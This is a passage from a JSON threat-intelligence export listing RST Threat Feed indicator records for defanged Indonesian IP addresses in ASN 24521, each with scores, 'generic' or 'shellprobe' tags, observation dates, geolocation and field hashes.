Feed](https://www.rstcloud.net/profeed) with score **12**.\n First seen: 2021-05-12T03:00:00, Last seen: 2021-08-23T03:00:00.\n IOC tags: **generic**.\nASN 24521: (First IP 203.89.24.0, Last IP 203.89.30.255).\nASN Name \"DATAUTAMANETASID\" and Organisation \"PT DATA Utama Dinamika\".\nASN hosts 165 domains.\nGEO IP information: City \"Jakarta\", Country \"Indonesia\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-08-24T00:00:00", "modified": "2021-05-12T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "immutableFields": [], "type": "rst", "lastseen": "2021-08-23T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "15b1952d45af0fec42d4426babe607ba"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "901d9f1472a057fa71e8794d1ca82b52"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "de2724d81932f145a49511c3995fb000"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "6579a7690462a707f4413bd5ce89ff43"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "b9b107cd7306b0198e599ea86550da98"}, {"key": "modified", "hash": "187d43d68afd95cd73ee64d8d6682291"}, {"key": "published", "hash": "1fd49358c9bd6a9dc4d6f9773081b085"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "6d6924c2e19ecead310d43e7e6be6a8b"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "52479ce8e668965adbd5376eb68fce61fe4eda82d02c068c6df5643c14c988e0", "viewCount": 0, "enchantments": {}, "objectVersion": "1.6", "iocType": "ip", "ip": ["203.89.28.86"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.28, "ioc_src": 54.78, "ioc_tags": 0.8, "ioc_total": 12.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Jakarta", "country": "Indonesia", "region": "Jakarta"}, "asn": {"cloud": "", "domains": 165, "firstip": {"netv4": "203.89.24.0", "num": "3411613696"}, "isp": "DATAUTAMANETASID", "lastip": {"netv4": "203.89.30.255", "num": "3411615487"}, "num": 24521, "org": "PT DATA Utama Dinamika"}, "threat": [], "cvss2": {}, "cvss3": {}}, {"id": "RST:AE396CBF-09E5-332A-99FD-CCD8484FFC95", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 203.89.25.102", "description": "Found **203[.]89.25.102** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **42**.\n First seen: 2021-08-13T03:00:00, Last seen: 2021-08-19T03:00:00.\n IOC tags: **shellprobe**.\nASN 24521: (First IP 203.89.24.0, Last IP 203.89.30.255).\nASN Name \"DATAUTAMANETASID\" and Organisation \"PT DATA Utama Dinamika\".\nASN hosts 165 domains.\nGEO IP information: City \"Jakarta\", Country \"Indonesia\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-08-20T00:00:00", "modified": "2021-08-13T00:00:00", "cvss": {}, "cvss2": {}, "cvss3": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "immutableFields": [], "type": "rst", "lastseen": "2021-08-19T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "15b1952d45af0fec42d4426babe607ba"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "c299fe4c468a48b3b8958bad36e758bd"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "de2724d81932f145a49511c3995fb000"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "6cc0ba90799b310993b728d72959caec"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "9b50c5c18ff38648eace9f9e31b76b08"}, {"key": "modified", "hash": "eb45ee330ece1d998183fb154d423653"}, {"key": "published", "hash": "b96f2c7b32689d438019cdd5352a1aff"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "7804d0d7c594283c7ef18b84e4339474"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "31e7223fc3576605a19adb471ec8afec"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "07363e274ec8bf73768dfda88cbf2da4d5ce29c531a12402d6cb4157ec6f2c38", "viewCount": 0, "enchantments": {}, "objectVersion": "1.6", "iocType": "ip", "ip": ["203.89.25.102"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.9, "ioc_src": 63.68, "ioc_tags": 0.75, "ioc_total": 42.0}, "tags": ["shellprobe"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Jakarta", "country": "Indonesia", "region": "Jakarta"}, "asn": {"cloud": "", "domains": 165, "firstip": {"netv4": "203.89.24.0", "num": "3411613696"}, "isp": "DATAUTAMANETASID", "lastip": {"netv4": "203.89.30.255", "num": "3411615487"}, "num": 24521, "org": "PT DATA Utama Dinamika"}, "threat": []}, {"id": "RST:E6B576DE-1509-384F-8B0B-4DB89964C4CA", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 112.109.16.255", "description": "Found **112[.]109.16.255** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **41**.\n First seen: 2021-08-07T03:00:00, Last seen: 2021-08-07T03:00:00.\n IOC tags: **shellprobe**.\nASN 24521: (First IP 112.109.16.0, Last IP 112.109.17.255).\nASN Name \"DATAUTAMANETASID\" and Organisation \"PT DATA Utama Dinamika\".\nASN hosts 165 domains.\nGEO IP information: City \"\", Country \"Indonesia\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-08-07T00:00:00", "modified": "2021-08-07T00:00:00", "cvss": {}, "cvss2": {}, "cvss3": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "immutableFields": [], "type": "rst", "lastseen": "2021-08-07T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "436c8ff51209b8755d3c823cc091149b"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "6f8d5acdfc67c346e1ddbd970d1f962f"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "8e15ecbd0004850e51f5b34845b302f9"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "d3858e09dc242bb5ccacea6119049167"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "bb91df428348ab58ca68cddaf3a7b135"}, {"key": "modified", "hash": "180519d907fefb95eb20406a8df873a9"}, {"key": "published", "hash": "180519d907fefb95eb20406a8df873a9"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "7804d0d7c594283c7ef18b84e4339474"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "9f62126888c7f44c6a4c4a4636629357"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "053f7eb41a7cea15cfe9b5b655e0d01b83f3fd2bf5556225980e25107003c4c4", "viewCount": 0, "enchantments": {}, "objectVersion": "1.6", "iocType": "ip", "ip": ["112.109.16.255"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 1.0, "ioc_src": 54.78, "ioc_tags": 0.75, "ioc_total": 41.0}, "tags": ["shellprobe"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "", "country": "Indonesia", "region": ""}, "asn": {"cloud": "", "domains": 165, "firstip": {"netv4": "112.109.16.0", "num": "1886195712"}, "isp": "DATAUTAMANETASID", "lastip": {"netv4": "112.109.17.255", "num": "1886196223"}, "num": 24521, "org": "PT DATA Utama Dinamika"}, "threat": []}, {"id": "RST:42498E42-096A-37AC-AB88-117EEF0C5D43", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 119.82.240.122", "description": "Found **119[.]82.240.122** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **22**.\n First seen: 2021-06-21T03:00:00, Last seen: 2021-08-04T03:00:00.\n IOC tags: **generic**.\nASN 24521: (First IP 119.82.240.0, Last IP 119.82.247.255).\nASN Name \"DATAUTAMANETASID\" and Organisation \"PT DATA Utama Dinamika\".\nASN hosts 165 domains.\nGEO IP information: City \"Surabaya\", Country \"Indonesia\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-08-05T00:00:00", "modified": "2021-06-21T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "immutableFields": [], "type": "rst", "lastseen": "2021-08-04T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "6f1984743b08470c061afed24d6f46f6"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "62606d20824729bfe3e574e09732747e"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "6a4d34ac41b6315f464221f6e4727c25"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "dc8a7da24cc1fb3dde4784da833c3dfb"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "864af5f19d9cd7f95dc4de8c4c5063b7"}, {"key": "modified", "hash": "779937c5193e71ff5f7d5c7ab1992307"}, {"key": "published", "hash": "539cb411f14545e379651d4098d7c47f"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "d2c3f52c1ef29f82942b1648bc0c012c"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "2c2df90f47dd71d1247f1dac785b273bbffca676420d5d8570df7a11aad28e69", "viewCount": 0, "enchantments": {}, "objectVersion": "1.6", "iocType": "ip", "ip": ["119.82.240.122"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.52, "ioc_src": 54.78, "ioc_tags": 0.8, "ioc_total": 22.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Surabaya", "country": "Indonesia", "region": "East Java"}, "asn": {"cloud": "", "domains": 165, "firstip": {"netv4": "119.82.240.0", "num": "2001924096"}, "isp": "DATAUTAMANETASID", "lastip": {"netv4": "119.82.247.255", "num": "2001926143"}, "num": 24521, "org": "PT DATA Utama Dinamika"}, "threat": [], "cvss2": {}, "cvss3": {}}, {"id": "RST:F9AB83D0-26EF-30F2-A3CF-BACDB4DC4686", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 119.82.240.125", "description": "Found **119[.]82.240.125** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **2**.\n First seen: 2021-03-11T03:00:00, Last seen: 2021-07-26T03:00:00.\n IOC tags: **generic**.\nASN 24521: (First IP 119.82.240.0, Last IP 119.82.247.255).\nASN Name \"DATAUTAMANETASID\" and Organisation \"PT DATA Utama Dinamika\".\nASN hosts 152 domains.\nGEO IP information: City \"Surabaya\", Country \"Indonesia\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-07-27T00:00:00", "modified": "2021-03-11T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2021-07-26T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "386a40afcde54226d047c77df85357c9"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "17ee6807617829c39bcb896eddca1dc9"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "6a4d34ac41b6315f464221f6e4727c25"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "39d2eab72f07ceaabdf30defb5749a62"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "988a288e3043c78222f373e34fe14969"}, {"key": "modified", "hash": "d277659b561c00f79f6620e2a0e2193b"}, {"key": "published", "hash": "b2a952d51e66ce457afaac08fe3cd0ba"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "47835e26301ceecd92fd25d15694a761"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "be4e3ce05616b6148eddb4385df24cc98304addaf430443f2f6f6c871de183f2", "viewCount": 0, "enchantments": {}, "objectVersion": "1.6", "iocType": "ip", "ip": ["119.82.240.125"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.21, "ioc_src": 16.44, "ioc_tags": 0.8, "ioc_total": 2.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Surabaya", "country": "Indonesia", "region": "East Java"}, "asn": {"cloud": "", "domains": 152, "firstip": {"netv4": "119.82.240.0", "num": "2001924096"}, "isp": "DATAUTAMANETASID", "lastip": {"netv4": "119.82.247.255", "num": "2001926143"}, "num": 24521, "org": "PT DATA Utama Dinamika"}, "threat": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "RST:054A83F1-8FBC-3EA4-A11E-E72446F8569B", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 112.109.20.7", "description": "Found **112[.]109.20.7** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **10**.\n First seen: 2021-03-12T03:00:00, Last seen: 2021-07-20T03:00:00.\n IOC tags: **generic**.\nASN 24521: (First IP 112.109.18.0, Last IP 112.109.22.255).\nASN Name \"DATAUTAMANETASID\" and Organisation \"PT DATA Utama Dinamika\".\nASN hosts 152 domains.\nGEO IP information: City \"\", Country \"Indonesia\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-07-21T00:00:00", "modified": "2021-03-12T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2021-07-20T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "8d85418eada3cfa8b67fe88ed9fc9dd4"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "21c419583a4192382f87c784d5f62a00"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "8e15ecbd0004850e51f5b34845b302f9"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "19ab084ee749bffc4b7aa8f441b1cb7e"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "31d468bc1d32f8daead368c9719d0d35"}, {"key": "modified", "hash": "e9cb2d117b7999a1deb1b8ff874072a8"}, {"key": "published", "hash": "c93d7d5564131b755d6cba297eead900"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "05412aa426c59ee903dbc2ed8961750e"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "dfe70d56a273146de81c12c84d6da4936db01431840cc22e6a144f4e0d1b27ba", "viewCount": 0, "enchantments": {}, "objectVersion": "1.5", "iocType": "ip", "ip": ["112.109.20.7"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.23, "ioc_src": 54.78, "ioc_tags": 0.8, "ioc_total": 10.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "", "country": "Indonesia", "region": ""}, "asn": {"cloud": "", "domains": 152, "firstip": {"netv4": "112.109.18.0", "num": "1886196224"}, "isp": "DATAUTAMANETASID", "lastip": {"netv4": "112.109.22.255", "num": "1886197503"}, "num": 24521, "org": "PT DATA Utama Dinamika"}, "threat": [], "immutableFields": []}, {"id": "RST:B420A493-8FAB-3D16-B964-DE67864B2E57", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 123.255.203.134", "description": "Found **123[.]255.203.134** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **42**.\n First seen: 2021-07-03T03:00:00, Last seen: 2021-07-09T03:00:00.\n IOC tags: **shellprobe**.\nASN 24521: (First IP 123.255.200.0, Last IP 123.255.207.255).\nASN Name \"DATAUTAMANETASID\" and Organisation \"PT DATA Utama Dinamika\".\nASN hosts 152 domains.\nGEO IP information: City \"Surabaya\", Country \"Indonesia\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-07-10T00:00:00", "modified": "2021-07-03T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "immutableFields": [], "type": "rst", "lastseen": "2021-07-09T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "66a14754b18c647d6d3647ad97d6edd0"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "75379649bf4dba6c03e871fe49047f8c"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "6a4d34ac41b6315f464221f6e4727c25"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "6cc0ba90799b310993b728d72959caec"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "da0ae7383d6792348c6c6c63efe853ce"}, {"key": "modified", "hash": "fccd8def43c730e8c4f4e6bff078132d"}, {"key": "published", "hash": "8183de15df938649434ce3582e1e1a5b"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "7804d0d7c594283c7ef18b84e4339474"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "e2f26764f1f73c63047f0cd0c83f1dbc"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "739c6f705cc1ca8d14007567d43c93327dc82deb17a2b3317a3e32ca19998246", "viewCount": 0, "enchantments": {}, "objectVersion": "1.5", "iocType": "ip", "ip": ["123.255.203.134"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.9, "ioc_src": 63.68, "ioc_tags": 0.75, "ioc_total": 42.0}, "tags": ["shellprobe"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Surabaya", "country": "Indonesia", "region": "East Java"}, "asn": {"cloud": "", "domains": 152, "firstip": {"netv4": "123.255.200.0", "num": "2080360448"}, "isp": "DATAUTAMANETASID", "lastip": {"netv4": "123.255.207.255", "num": "2080362495"}, "num": 24521, "org": "PT DATA Utama Dinamika"}, "threat": []}, {"id": "RST:AA199C23-54AD-39E2-983A-A12CA6050225", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 119.82.240.146", "description": "Found **119[.]82.240.146** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **42**.\n First seen: 2021-06-30T03:00:00, Last seen: 2021-07-06T03:00:00.\n IOC tags: **shellprobe**.\nASN 24521: (First IP 119.82.240.0, Last IP 119.82.247.255).\nASN Name \"DATAUTAMANETASID\" and Organisation \"PT DATA Utama Dinamika\".\nASN hosts 152 domains.\nGEO IP information: City \"Surabaya\", Country \"Indonesia\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-07-07T00:00:00", "modified": "2021-06-30T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "immutableFields": [], "type": "rst", "lastseen": "2021-07-06T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "386a40afcde54226d047c77df85357c9"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "5659c26aaaecf25f29dc3c87a3759bbe"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "6a4d34ac41b6315f464221f6e4727c25"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "6cc0ba90799b310993b728d72959caec"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "3e2ee80c4a359c4640d99efe3e6b1f0c"}, {"key": "modified", "hash": "82ea556d0af682098f3ce4d21767f220"}, {"key": "published", "hash": "155e1e796d6cadc06fd68ae6f7668eb0"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "7804d0d7c594283c7ef18b84e4339474"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "cc857f5fff56b2541d7be48074e0d366"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "1f947ec1bc5943c842dd24fd5184e56a95dd91d37c0d651893bfb1bf03b7f32c", "viewCount": 0, "enchantments": {}, "objectVersion": "1.5", "iocType": "ip", "ip": ["119.82.240.146"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.9, "ioc_src": 63.68, "ioc_tags": 0.75, "ioc_total": 42.0}, "tags": ["shellprobe"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Surabaya", "country": "Indonesia", "region": "East Java"}, "asn": {"cloud": "", "domains": 152, "firstip": {"netv4": "119.82.240.0", "num": "2001924096"}, "isp": "DATAUTAMANETASID", "lastip": {"netv4": "119.82.247.255", "num": "2001926143"}, "num": 24521, "org": "PT DATA Utama Dinamika"}, "threat": []}, {"id": "RST:9FCC50A6-0CC3-342F-8E69-88BC1E2A4F9A", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 119.82.241.66", "description": "Found **119[.]82.241.66** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **4**.\n First seen: 2020-02-04T03:00:00, Last seen: 2020-10-05T03:00:00.\n IOC tags: **generic**.\nASN 24521: (First IP 119.82.240.0, Last IP 119.82.247.255).\nASN Name \"DATAUTAMANETASID\" and Organisation \"PT DATA Utama Dinamika\".\nASN hosts 149 domains.\nGEO IP information: City \"Surabaya\", Country \"Indonesia\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-06-13T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2020-10-05T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "4ea2370c626772bfd48d8d3029a2d6bc"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "de2096e7cf61cef1d19fc011a59eff8e"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "6a4d34ac41b6315f464221f6e4727c25"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "e5c45b2a1ea64f479e5ca1ae64cf38a1"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "2333d32b06fa2e77ff84909ba644f3d8"}, {"key": "modified", "hash": "879a669f63dca1f9d6647d406827fa9f"}, {"key": "published", "hash": "ef623e359e53ba11f365bf69639d5f43"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": 